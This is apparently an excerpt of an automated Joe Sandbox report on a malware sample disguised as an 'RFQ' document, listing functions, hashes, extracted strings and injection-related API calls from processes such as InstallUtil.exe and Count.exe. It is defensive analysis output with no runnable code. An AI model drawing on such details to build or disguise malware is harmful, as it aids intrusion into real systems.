Instruction Fuzzy Hash: A141C570D016188FEB68CF6AC84879DFBF6BF88304F04C1AAD54CA6264DB754A858F01

Function 06A5C3A0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1795041376.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66c91a7d04b28f6fbe0f09f15104d8f6c05d65fe656ccfcf18144073b7d4c62a
Instruction ID: 907f2472e15782db3c0f224b183839b8c6f7022d40860d056f6129e910c2c568
Opcode Fuzzy Hash: 66c91a7d04b28f6fbe0f09f15104d8f6c05d65fe656ccfcf18144073b7d4c62a
Instruction Fuzzy Hash: 4341E371E01218CBEB58DFAAD8447DDBBF2BB89310F15C06AD80AAB258D7740985CF50

Function 068116F8 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1793926859.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6810000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f2cf1ef1ae0af650500daed82dcacccb046be2c7ff9a3c8a6a9952f1a63373f
Instruction ID: 06cdda260daa4fe6551ec97f031726b4cabf526b493a77f1182a7bb00b776bf3
Opcode Fuzzy Hash: 6f2cf1ef1ae0af650500daed82dcacccb046be2c7ff9a3c8a6a9952f1a63373f
Instruction Fuzzy Hash: 224193B0D05618CFEB68CF6AC84879DFBF6BF88304F04C1AAD44CA6264DB744A858F01

Function 06907841 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794585967.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6900000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40aac2664cee0e7ac763cbc76ff5d0315956b5d66ec053b1ab5b019b32b31710
Instruction ID: fe91d65213f056130162b3f3bfb737348cf796b35bb9f60bd3461f85757d9493
Opcode Fuzzy Hash: 40aac2664cee0e7ac763cbc76ff5d0315956b5d66ec053b1ab5b019b32b31710
Instruction Fuzzy Hash: 54417DB1E056588FEB58CF6B884069EFAF7AFC8200F14C0BA955CAB255DB304546CF05

Function 06D10007 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1795589611.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3bfff3c9862559990bdd637278f90cf2d481d07eb49b828ac81ff08c6e448d6
Instruction ID: 5fcdaecd0832e722909501f6655becd8027be86543a109de03384787b48ba28f
Opcode Fuzzy Hash: f3bfff3c9862559990bdd637278f90cf2d481d07eb49b828ac81ff08c6e448d6
Instruction Fuzzy Hash: 50314071D04794DFE729CF678C14689BBF6AF85300F05C0EAD448AB265DB740986DF51

Function 06D10040 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1795589611.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f83bf2442ce840d7f4cf4ec74442f29f88ce4df2a75587c9305279b4fadb2039
Instruction ID: f168bd072de62e8d3a4efac216f1a03fc82ce308b450be1acf8246949471ef87
Opcode Fuzzy Hash: f83bf2442ce840d7f4cf4ec74442f29f88ce4df2a75587c9305279b4fadb2039
Instruction Fuzzy Hash: C321C771E046698BEB28CF6BD844299FBF7ABC8304F04C0BAD84CA6215DB7049858F51

Function 0681D380 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1793926859.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6810000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3567b580c6aa1514e0431baa44e8d491b34449354acfc16120a046fbbba1a17
Instruction ID: 04ebbe8fdc584a5e51d7926dcef8444b95538a4698f153a44f0b34c6a55957b0
Opcode Fuzzy Hash: e3567b580c6aa1514e0431baa44e8d491b34449354acfc16120a046fbbba1a17
Instruction Fuzzy Hash: 5121CF71E056189BEB6CCF5B99402DDFBF7AFC9300F14C5BA9508AA214EB300A468F41

Function 0681D390 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1793926859.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6810000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dab2a2225d4ea9f064d0ae12cbe9856439d2ffcd852e948ae528eeb6aeaa90b
Instruction ID: a59f59fa82a88d3f98850f384dfc64d67dbfd300c4c60cde01cfaf305187ac54
Opcode Fuzzy Hash: 3dab2a2225d4ea9f064d0ae12cbe9856439d2ffcd852e948ae528eeb6aeaa90b
Instruction Fuzzy Hash: 1421BC71E056189BEB68CF6BD9406DEFBF7AFC9300F14D1BA980CAA214DB741A458F40

Function 068FB9F0 Relevance: 7.7, Strings: 6, Instructions: 156COMMON

Download Yara Rule

Strings

4'^q, xrefs: 068FBAC2
4'^q, xrefs: 068FBAA4
4'^q, xrefs: 068FBB3A
4'^q, xrefs: 068FBA74
(bq, xrefs: 068FBBBA
pbq, xrefs: 068FBB47

Memory Dump Source

Source File: 00000000.00000002.1794536907.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68f0000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
API String ID: 0-723292480
Opcode ID: b74ae1d5bbd6231bab0f89e46cd4b90385592e835afd90d2a618e3033e4d6120
Instruction ID: f250e7a3dc2daca71489bfebedd927dc59bd0336562a5935e3def95b5f9bd227
Opcode Fuzzy Hash: b74ae1d5bbd6231bab0f89e46cd4b90385592e835afd90d2a618e3033e4d6120
Instruction Fuzzy Hash: 30519F30A402098FC748DB79C9506AEBBE7BFC8300F14896DC549DB3A9DF35994A87A1

Analysis Process: InstallUtil.exePID: 7856, Parent PID: 2580COMMON

Executed Functions

Function 00F41D18 Relevance: 1.5, Strings: 1, Instructions: 229COMMON

Download Yara Rule

Strings

Te^q, xrefs: 00F41E9C

Memory Dump Source

Source File: 00000001.00000002.4118278029.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f40000_InstallUtil.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 6e8b3f1b4dd0d66ea023b998b6a4bae972e9298f300226aed0a5a867bdfece67
Instruction ID: 2bf2f165d9a15fbd6027cf332b0626b634f1cd6e1fd2bf3bbea52fa2060a1582
Opcode Fuzzy Hash: 6e8b3f1b4dd0d66ea023b998b6a4bae972e9298f300226aed0a5a867bdfece67
Instruction Fuzzy Hash: 43915C34A00104DFD754DF68D898BA97BF2FB98321F2584A5E9069B365CB749CC9EB40

Function 00F41D28 Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

Te^q, xrefs: 00F41E9C

Memory Dump Source

Source File: 00000001.00000002.4118278029.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f40000_InstallUtil.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 1859ebae8c88ae6e3de8fe2b0be35ebbced643c5d365ba3c287812acf947a620
Instruction ID: 04e975ae7e5c983c0a1ae864af397af249073b3e59557202db2644d896a35322
Opcode Fuzzy Hash: 1859ebae8c88ae6e3de8fe2b0be35ebbced643c5d365ba3c287812acf947a620
Instruction Fuzzy Hash: 49915C34A00104CFD754DF68E898BA97BF2FB98320F6584B5E9069B365CB749CC9EB40

Function 00F423D2 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

Deq, xrefs: 00F4246F

Memory Dump Source

Source File: 00000001.00000002.4118278029.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f40000_InstallUtil.jbxd

Similarity

API ID:
String ID: Deq
API String ID: 0-948982800
Opcode ID: a5d49756629e305b631bb2038c66a8a24a31d9c664efa7c891382337abe5a33b
Instruction ID: 17600d26a082b6f10df8915c15b55b192a29de328ae67a00c5591621e572cdb7
Opcode Fuzzy Hash: a5d49756629e305b631bb2038c66a8a24a31d9c664efa7c891382337abe5a33b
Instruction Fuzzy Hash: C2A1CD34A006009FCB24DF69D5A4A5DBBF2FF88310F5581A9E809EB3A5DB75EC41DB90

Function 00F41B90 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4118278029.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5abe66d435bd4c2fdfbb4b6514f219c086baff7086aceb743e8b5658e38aa39c
Instruction ID: 40fb9d6f5a6ec9f78d663439624efe37d7fe0afcf6107310ae8126971119dc8c
Opcode Fuzzy Hash: 5abe66d435bd4c2fdfbb4b6514f219c086baff7086aceb743e8b5658e38aa39c
Instruction Fuzzy Hash: 0C3106357002008FD720DB28D8A4BBA7BE2FBC4350F1581BAE905CBBA4EA74DCC59B40

Function 00C4D4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4116612910.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c4d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3892f746befba4b939b855a859df4f6145170c15a3663cd0a42792f44dd6295b
Instruction ID: 38c9ad99201fc976d6013acddb1836bfb9b966beeea0c2f83b4120f2c7ff2cc1
Opcode Fuzzy Hash: 3892f746befba4b939b855a859df4f6145170c15a3663cd0a42792f44dd6295b
Instruction Fuzzy Hash: 4D2125B1504200DFDB05EF14D9C0B27BFA5FB98328F20C169E90A0B256C736D856CBA2

Function 00C4D49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4116612910.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c4d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 97d83546e7e922bbd22e57ab3c90d065b37ec3b10ec104950af1ce1bdc40ed9b
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 2911D3B6904240CFDF16DF14D5C4B16BF71FB94324F24C5A9D90A0B256C336D95ACBA2

Function 00F41AB1 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4118278029.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d186b32d72494c2b5c66c86a894e06e747ddd5fb15bd73624ec96c4996430d46
Instruction ID: f811cb3ec8dcb72661e62346911c076ed7d9aef63634a88d373e7e0fe18edc77
Opcode Fuzzy Hash: d186b32d72494c2b5c66c86a894e06e747ddd5fb15bd73624ec96c4996430d46
Instruction Fuzzy Hash: DB112574D05248EFCB40EFA8D55479EBFF1EB85300F2080EAD8099B252E7785AC9EB01

Function 00C4D809 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4116612910.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c4d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb07cf0b0359899e2c0f77e9902690b5dcbb4b7984590a7c0fbee8d97d423868
Instruction ID: b2cc653c3316bd3afe159687aa3e720f4c913468b3bbdd55dc97e41b788277e8
Opcode Fuzzy Hash: fb07cf0b0359899e2c0f77e9902690b5dcbb4b7984590a7c0fbee8d97d423868
Instruction Fuzzy Hash: 6D01F2314093009AE710AA2ACD84777BFA8FF41324F18C42AEC1A0A2C6C239D980CAF1

Function 00F41AC0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4118278029.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba50f4ec6953de14d9bc58c97b4bcd0ca0770198889db3e75b9947cf182715c7
Instruction ID: df635ef9bbe631142b78154fd0c161ed7bc2f4c69985a95a44a43c6a23a88c72
Opcode Fuzzy Hash: ba50f4ec6953de14d9bc58c97b4bcd0ca0770198889db3e75b9947cf182715c7
Instruction Fuzzy Hash: 02110574E41208EFDB50EFA9D5947AEBBF1FB84304F2080A9D809A7251E7785AC5EB00

Function 00F40901 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4118278029.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61379d675c4663bc9bfee05670e5484c4fbf3ce3c078a3bec7bc69eb31cfa66d
Instruction ID: 1d2d109fefc52d76754cfe491c1fde4eacc57de5b60da17369e08d96491b2f89
Opcode Fuzzy Hash: 61379d675c4663bc9bfee05670e5484c4fbf3ce3c078a3bec7bc69eb31cfa66d
Instruction Fuzzy Hash: C2F053162AE7D48FE30753B00CB92827FB8990312634A00D7C0C9DF8A3D48C189ECBB2

Function 00F4199F Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4118278029.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97e3f6e520466d937cfeed3252cedc28258941dfba23a939f85935320a2942f5
Instruction ID: ecae2edf8231cacf324faee210ab12eb178c2acb5cd97114363c5de222159024
Opcode Fuzzy Hash: 97e3f6e520466d937cfeed3252cedc28258941dfba23a939f85935320a2942f5
Instruction Fuzzy Hash: CC01AF3960A7A49FDB178765E8647D83FA0ABA3305F5842D6C0448B2B3E36948CAD721

Function 00C4D808 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4116612910.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c4d000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b4b25159003024c2001cb12fd229d2ab3b420aa80f002016d90b753a6f7984f
Instruction ID: 5559e79deb2514e4291e3ecd5e72cbdb72187d3020c320fd0ccd57d6c2717225
Opcode Fuzzy Hash: 9b4b25159003024c2001cb12fd229d2ab3b420aa80f002016d90b753a6f7984f
Instruction Fuzzy Hash: 91F0CD71408340AAE7209A1ACC88B66FFA8FF51734F18C45AED190B286C2799D80CAB0

Function 00F419B8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4118278029.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45f9f9fd09c4ccd7e02a2616f675e7303668d601f75aa98d609a6a01cd875b81
Instruction ID: a82209f55881e61968a5c0255f7447654015e285366a53de6ad976d9f62d58df
Opcode Fuzzy Hash: 45f9f9fd09c4ccd7e02a2616f675e7303668d601f75aa98d609a6a01cd875b81
Instruction Fuzzy Hash: 07D0C934009774CFC3025B60D9666C53FB8EE0B20135500D2E04ADF4B3D6219C49C361

Function 00F41A29 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4118278029.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0deae8ffb268d9211655e6d1a7697f63526c81e8cfe59bec69bbe8dc7366a5f
Instruction ID: 6c8f869b0d87590ade4d3430df5ccc7ac4d04bd58e2348ed0b7506882ec79259
Opcode Fuzzy Hash: c0deae8ffb268d9211655e6d1a7697f63526c81e8cfe59bec69bbe8dc7366a5f
Instruction Fuzzy Hash: 74E0E21464E7D00FDB07437058382193F706A9330A70D01CBC886DF6F3C4091888A322

Function 00F43E32 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4118278029.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e32c8fa119b76589e94dd1a3a509284b3b9804156b04d6ba911b0a8e88dea9c6
Instruction ID: 46e839460c62ff867dd573c6b0b1e43d3cad395ecc28afd03ac6ef13b1299d08
Opcode Fuzzy Hash: e32c8fa119b76589e94dd1a3a509284b3b9804156b04d6ba911b0a8e88dea9c6
Instruction Fuzzy Hash: 69C01236A00028ABDB005BA0E800AEC7BF2FB88300F204120F801B3271CA218C88AB00

Function 00F419C8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4118278029.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e648e4fb625e77acdc02a51fe5a8cb54c8bd6eeb19c2bc48e9ce5fc7503e1135
Instruction ID: 5cda39b9ed97ed9cf22fed7806812e248564b65972aa5d754bbcc961136378da
Opcode Fuzzy Hash: e648e4fb625e77acdc02a51fe5a8cb54c8bd6eeb19c2bc48e9ce5fc7503e1135
Instruction Fuzzy Hash: 33A01138080B08CB82002BA0BE2E32C3BACEA082033880020A00EA82B08A2028808A80

Function 00F40950 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4118278029.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da998f6cc98c84e03d46128e29883f6380502d27defbefaaef9aa818a77ba646
Instruction ID: a98fa91ebb7a1448153db4527d153c58a37964fc89df8b5803eb3a29fb15a6bf
Opcode Fuzzy Hash: da998f6cc98c84e03d46128e29883f6380502d27defbefaaef9aa818a77ba646
Instruction Fuzzy Hash: 0590023608470CCB45442795780A79AB75CB54452B7851051A50D515115AD564E145D5

Analysis Process: Count.exePID: 8136, Parent PID: 8088COMMON

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	328
Total number of Limit Nodes:	14

Executed Functions

Function 061D4610 Relevance: 16.1, Strings: 12, Instructions: 1143COMMON

Download Yara Rule

Strings

$^q, xrefs: 061D4B17
$^q, xrefs: 061D4EF1
$^q, xrefs: 061D48B3
$^q, xrefs: 061D48A3
,bq, xrefs: 061D50DA
$^q, xrefs: 061D4A77
$^q, xrefs: 061D4B27
$^q, xrefs: 061D4A67
$^q, xrefs: 061D4F5A
$^q, xrefs: 061D4F01
4, xrefs: 061D4FF5
$^q, xrefs: 061D4F4A

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-312445597
Opcode ID: 4478a1f8680d794785b934823895ca369c216534176f7579bb10cbc381725119
Instruction ID: 908b006bc056ae878544b8654c97a7255d4c1be5afb5ba479fb44248e9050172
Opcode Fuzzy Hash: 4478a1f8680d794785b934823895ca369c216534176f7579bb10cbc381725119
Instruction Fuzzy Hash: 67B20734A002289FDB54CFA9C984BADB7F6BF88700F158599E505AB3A5DB70EC85CF50

Function 061D4947 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$^q, xrefs: 061D4B17
$^q, xrefs: 061D4EF1
,bq, xrefs: 061D50DA
$^q, xrefs: 061D4A67
4, xrefs: 061D4FF5
$^q, xrefs: 061D4F4A

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q
API String ID: 0-2546334966
Opcode ID: 3f4df628287e807c3d8b6eeff1d8fe2e7beb9576b358787adbbe8125153e3bed
Instruction ID: e26219e5eb6434127fc3bfadc31a89e30fad09a226d2e978e3064afb0974d60c
Opcode Fuzzy Hash: 3f4df628287e807c3d8b6eeff1d8fe2e7beb9576b358787adbbe8125153e3bed
Instruction Fuzzy Hash: 2C22FB34A00228DFDB64DF69C984BADB7F2FF48304F1581A9E509AB2A5DB709D85CF50

Function 061D7F90 Relevance: 3.1, Strings: 2, Instructions: 639
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Pl^q, xrefs: 061D8178
$^q, xrefs: 061D825E

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: Pl^q$$^q
API String ID: 0-2677662154
Opcode ID: ce48f3b882f6c1623f7e2532d6c2ab63f276aae9cbb1e2bff895ca17116f3313
Instruction ID: d1d89a9fb4c21eeeadf7495a3cc92f37f41e73f32b50cef9d8cc60b57976f48d
Opcode Fuzzy Hash: ce48f3b882f6c1623f7e2532d6c2ab63f276aae9cbb1e2bff895ca17116f3313
Instruction Fuzzy Hash: 69323A34B102088FDB98DF29C984A6E77F6BF89714B1584A9E506CB3B5DB31EC42CB51

Function 0551DCB0 Relevance: 3.1, Strings: 2, Instructions: 616
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 0551DDCD
8, xrefs: 0551DDBA

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID: fcq$8
API String ID: 0-89531850
Opcode ID: 35a95f1a9c06311f76ec4abef8a8c26f709b8e33a65d5c3bd22931acfb4a8585
Instruction ID: d124f0e26943024f9aa0f15bb04fd050e9b6796e15b961e99ff20afa2784741e
Opcode Fuzzy Hash: 35a95f1a9c06311f76ec4abef8a8c26f709b8e33a65d5c3bd22931acfb4a8585
Instruction Fuzzy Hash: E552D875E006298FDB64DF69D890AD9B7B6FF89300F1086A9D90DA7354DB30AE85CF40

Function 061D0016 Relevance: 1.7, Strings: 1, Instructions: 487COMMON

Download Yara Rule

Strings

Te^q, xrefs: 061D03F8

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: dfb82ae673e3c0134c854763ac87f4df9cfdddb3dc3ef1d9512e60046f5f3b97
Instruction ID: 5fb0cfe88b4fc53a3afe106c8f2711e7bd369863c153ba640a2dac8e16f4f876
Opcode Fuzzy Hash: dfb82ae673e3c0134c854763ac87f4df9cfdddb3dc3ef1d9512e60046f5f3b97
Instruction Fuzzy Hash: BF222670E01218CFEBA4DF68D844BD9BBB2FB89301F1081A9D549E72A5DB305E86CF41

Function 061D0040 Relevance: 1.7, Strings: 1, Instructions: 460COMMON

Download Yara Rule

Strings

Te^q, xrefs: 061D03F8

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 45c3709cad6bafbf811c9735572d08cd54cfff5327ea5b712428f69ed50b5f53
Instruction ID: ebaacb077544e2412701cd883f0f58e9390452704858a0090cb4226044fb6b9c
Opcode Fuzzy Hash: 45c3709cad6bafbf811c9735572d08cd54cfff5327ea5b712428f69ed50b5f53
Instruction Fuzzy Hash: 9322F370E05218CFEBA8DF69D844BD9B7F6FB89301F1080A9D549A72A5DB309E85CF41

Function 06310989 Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06310A19

Memory Dump Source

Source File: 00000004.00000002.2041971076.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6310000_Count.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: e239aa45a67e684047a02b8f8e8c2f74b047efe46c0a5c4f3fc76847a2a968d4
Instruction ID: 3bbb0bfcff57f3ee4dad76fef26b75ff751e6b966b2aa3f8df7577c22a0a6833
Opcode Fuzzy Hash: e239aa45a67e684047a02b8f8e8c2f74b047efe46c0a5c4f3fc76847a2a968d4
Instruction Fuzzy Hash: 4C2114B5D013499FCB10CFA9D980AEEFBF5FF48314F20842AE859A7210C7359944CBA0

Function 06310990 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06310A19

Memory Dump Source

Source File: 00000004.00000002.2041971076.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6310000_Count.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 859064d5b2317c945406331ab4f93d76a3f6ea2f98f495845ac0f7362ee12072
Instruction ID: b70875bf8b50fca8d4ff2dc603b0ade00f9a9f298eeab8d0c6349412c8215959
Opcode Fuzzy Hash: 859064d5b2317c945406331ab4f93d76a3f6ea2f98f495845ac0f7362ee12072
Instruction Fuzzy Hash: 232112B1D013499FCB10DFAAD980ADEFBF5FF48310F20842AE819A7210C775A944CBA4

Function 063137F0 Relevance: 1.6, APIs: 1, Instructions: 57nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06313866

Memory Dump Source

Source File: 00000004.00000002.2041971076.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6310000_Count.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d8259668c5a6ed27200d4d177b68d1e57e8d6c0bcfd83035b2d057c19c30bd5a
Instruction ID: 265cbb1e45fe8f9dafe51ce5a8f7e412fe87245abce09184287e791c5f5451a0
Opcode Fuzzy Hash: d8259668c5a6ed27200d4d177b68d1e57e8d6c0bcfd83035b2d057c19c30bd5a
